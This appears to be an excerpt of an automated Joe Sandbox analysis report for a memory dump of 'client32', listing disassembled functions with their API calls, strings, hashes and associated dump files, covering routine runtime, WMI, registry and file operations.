Uniqueness Score: -1.00%

Function 11163CB2 Relevance: 10.6, APIs: 7, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDecodePointer.NTDLL(?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163CC7
DecodePointer.KERNEL32(?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163CD4
__realloc_crt.LIBCMT ref: 11163D11
__realloc_crt.LIBCMT ref: 11163D27
EncodePointer.KERNEL32(00000000,?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163D39
EncodePointer.KERNEL32(?,?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163D4D
EncodePointer.KERNEL32(-00000004,?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163D55

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Pointer$Encode$Decode__realloc_crt
String ID:
API String ID: 4108716018-0
Opcode ID: 78b66c0ccf40e1ea873e96cc16d33ba7024ac8dccc44993d1929be3c3bf886a8
Instruction ID: 9b559eab580439f7d32e9cac7dbac1f1bc4b8bf1504d6bec0d436b7e194fb771
Opcode Fuzzy Hash: 78b66c0ccf40e1ea873e96cc16d33ba7024ac8dccc44993d1929be3c3bf886a8
Instruction Fuzzy Hash: EA11D632518236AFDB005F79DCD488EFBEDEB41268751043AE819D7211EBB2ED54DB80

Uniqueness

Uniqueness Score: -1.00%

Function 110178F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(00000360,000000FF), ref: 1101792C
CoInitialize.OLE32(00000000), ref: 11017935
_GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
CoUninitialize.OLE32 ref: 110179C0

Strings

Win32_ComputerSystem, xrefs: 1101794D
PCSystemTypeEx, xrefs: 1101796C

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InitializeObjectSingleStringUninitializeW@16Wait
String ID: PCSystemTypeEx$Win32_ComputerSystem
API String ID: 2407233060-578995875
Opcode ID: e36d99758dc03e0598981b4f88c4856ef9492612d0c70df356ba7875e798591a
Instruction ID: 979ee595df3e366e36f6db43f9274242a875182caa54ddfda208ac7f01cc4ef4
Opcode Fuzzy Hash: e36d99758dc03e0598981b4f88c4856ef9492612d0c70df356ba7875e798591a
Instruction Fuzzy Hash: BE213EB5D0166A9FDB11CFA48C40BBAB7E99F4170CF0000B4EC59DB188EB79D544D791

Uniqueness

Uniqueness Score: -1.00%

Function 11017810 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(00000360,000000FF), ref: 11017842
CoInitialize.OLE32(00000000), ref: 1101784B
_GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
CoUninitialize.OLE32 ref: 110178D0

Strings

Win32_SystemEnclosure, xrefs: 11017863
ChassisTypes, xrefs: 11017882

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InitializeObjectSingleStringUninitializeW@16Wait
String ID: ChassisTypes$Win32_SystemEnclosure
API String ID: 2407233060-2037925671
Opcode ID: 7fe03c0a07b0f7c8829a27351349684dd2fb94aad29d92fbe6e61ac0174dbd6e
Instruction ID: 35f99737241494c501e89beb979cd88c9c6eddc8ed8b09fe319fdcc96c080ea2
Opcode Fuzzy Hash: 7fe03c0a07b0f7c8829a27351349684dd2fb94aad29d92fbe6e61ac0174dbd6e
Instruction Fuzzy Hash: D7210875D4112A9BD711CFA4CD40BAEBBE89F40309F0000A4EC29DB244EE75D910C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 11110040 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,77D59EB0,00000000,?,11110F55,11110AF0,00000001,00000000), ref: 11110057
CreateThread.KERNEL32 ref: 1111007A
WaitForSingleObject.KERNEL32(?,000000FF,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100A7
FindCloseChangeNotification.KERNEL32(?,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100B1

Strings

hThread, xrefs: 11110090
..\ctl32\Refcount.cpp, xrefs: 1111008B

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
String ID: ..\ctl32\Refcount.cpp$hThread
API String ID: 2579639479-1136101629
Opcode ID: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
Instruction ID: 76930d23ba1481c48ceb924dc08d7adf498fcac35268297604c83f904cd53e19
Opcode Fuzzy Hash: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
Instruction Fuzzy Hash: A0018435780715BFF3208EA5CD85F57FBA9DB45765F104138FA259B6C4D670E8048BA0

Uniqueness

Uniqueness Score: -1.00%

Function 11145F00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
RegCloseKey.ADVAPI32(?), ref: 11145FD4

Strings

SOFTWARE\NetSupport Ltd\PCICTL, xrefs: 11145F50
SOFTWARE\Productive Computer Insight\PCICTL, xrefs: 11145F37, 11145F6E
ForceRTL, xrefs: 11145F93

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseOpen
String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
API String ID: 47109696-3245241687
Opcode ID: a2c2ae4e5c4c2a275a787743371364b614ebaa02131a0ba05eddfad67ef0d136
Instruction ID: 1d1f817806b548678a0140876f7b35b9e852c49707e53231e183cf95c3cf5809
Opcode Fuzzy Hash: a2c2ae4e5c4c2a275a787743371364b614ebaa02131a0ba05eddfad67ef0d136
Instruction Fuzzy Hash: 1E21DD71E0022A9BE764DA64CD80FDEF778AB45718F1041AAE81DF3941D7319D458BA3

Uniqueness

Uniqueness Score: -1.00%

Function 111479B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

LoadStringA.USER32 ref: 111479DF
wsprintfA.USER32 ref: 11147A16

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

i < _tsizeof (buf), xrefs: 11147A30
#%d, xrefs: 11147A10
..\ctl32\util.cpp, xrefs: 11147A2B

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$ErrorExitLastLoadMessageProcessString
String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
API String ID: 1985783259-2296142801
Opcode ID: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
Instruction ID: f4f04ea69c0c381d0959b313e9907706ba85fe26c30e15a9a088fcfc7c116df7
Opcode Fuzzy Hash: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
Instruction Fuzzy Hash: 6811E5FAE00218A7D710DEA49D81FEAF36C9B44608F100165FB08F6141EB70AA05CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 111101B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 111101C9

Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56

wsprintfA.USER32 ref: 111101E4

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

_memset.LIBCMT ref: 11110207

Strings

Can't alloc %u bytes, xrefs: 111101DE
..\ctl32\Refcount.cpp, xrefs: 111101F5

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
API String ID: 3234921582-2664294811
Opcode ID: cdd1c54386482822face1726c8a555e59ef6984596166c085d167c5bbae17b0a
Instruction ID: 098e5996781ad60247c7fcf5caa4ca36f886f8102b778af333740a2f918ca33d
Opcode Fuzzy Hash: cdd1c54386482822face1726c8a555e59ef6984596166c085d167c5bbae17b0a
Instruction Fuzzy Hash: C0F0F6B6E4022863C7209AA49D01FEFF37C9F91609F0001A9FE05B7241EA75AA11C7E5

Uniqueness

Uniqueness Score: -1.00%

Function 11145240 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(11145918,00000000,?,11145918,00000000), ref: 1114525C
__strdup.LIBCMT ref: 11145277

Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E

Part of subcall function 11145240: _free.LIBCMT ref: 1114529E

_free.LIBCMT ref: 111452AC

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

CreateDirectoryA.KERNEL32(11145918,00000000,?,?,?,11145918,00000000), ref: 111452B7

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
String ID:
API String ID: 398584587-0
Opcode ID: 0f4bda93c2fa95a79c6cfec15824fc43f5b70deef06045cf9c901e7bc6b82896
Instruction ID: a914e2cea8ad1481f503ba01f1d1a08edacf548165b8a11fd341c03149d2e1b0
Opcode Fuzzy Hash: 0f4bda93c2fa95a79c6cfec15824fc43f5b70deef06045cf9c901e7bc6b82896
Instruction Fuzzy Hash: 9301D276A04216ABF34115BD6D01FABBB8C8BD2A78F240173F84DD6A81E752E41681A2

Uniqueness

Uniqueness Score: -1.00%

Function 1100EE20 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EE52

Part of subcall function 111616DA: _setlocale.LIBCMT ref: 111616EC

_free.LIBCMT ref: 1100EE64

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

_free.LIBCMT ref: 1100EE77
_free.LIBCMT ref: 1100EE8A
_free.LIBCMT ref: 1100EE9D

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 3515823920-0
Opcode ID: 2e35b712453e3aca300581a17372c071556ff8d0d73a2570e12bcc12396a77d4
Instruction ID: a44a88996e3d62c283fa82fd04d5e1258298656dbf2da44853d36c331dab430a
Opcode Fuzzy Hash: 2e35b712453e3aca300581a17372c071556ff8d0d73a2570e12bcc12396a77d4
Instruction Fuzzy Hash: 9511B2F2D046559BE720CF99D800A5BFBECEB50764F144A2AE49AD3640E7B2F904CA51

Uniqueness

Uniqueness Score: -1.00%

Function 11143E00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,775EC740,?), ref: 11143E97
CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
FindCloseChangeNotification.KERNEL32(00000000), ref: 11143EBF

Strings

", xrefs: 11143E4E

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFile$ChangeCloseFindNotification
String ID: "
API String ID: 353575653-123907689
Opcode ID: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
Instruction ID: 3d5505e67506a11152adc20893aebb2e29c51f354ea5d43c8ad60c1cab3f6bda
Opcode Fuzzy Hash: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
Instruction Fuzzy Hash: 5921BB31A092B9AFE332CE38DD54BD9BB989B42B14F3002E0E4D5AB5C1DBB19948C750

Uniqueness

Uniqueness Score: -1.00%

Function 110179E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 110179ED

Part of subcall function 110178F0: WaitForSingleObject.KERNEL32(00000360,000000FF), ref: 1101792C
Part of subcall function 110178F0: CoInitialize.OLE32(00000000), ref: 11017935
Part of subcall function 110178F0: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
Part of subcall function 110178F0: CoUninitialize.OLE32 ref: 110179C0

Part of subcall function 11017810: WaitForSingleObject.KERNEL32(00000360,000000FF), ref: 11017842
Part of subcall function 11017810: CoInitialize.OLE32(00000000), ref: 1101784B
Part of subcall function 11017810: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
Part of subcall function 11017810: CoUninitialize.OLE32 ref: 110178D0

SetEvent.KERNEL32(00000360), ref: 11017A0D
GetTickCount.KERNEL32 ref: 11017A13

Strings

touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 11017A1D

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
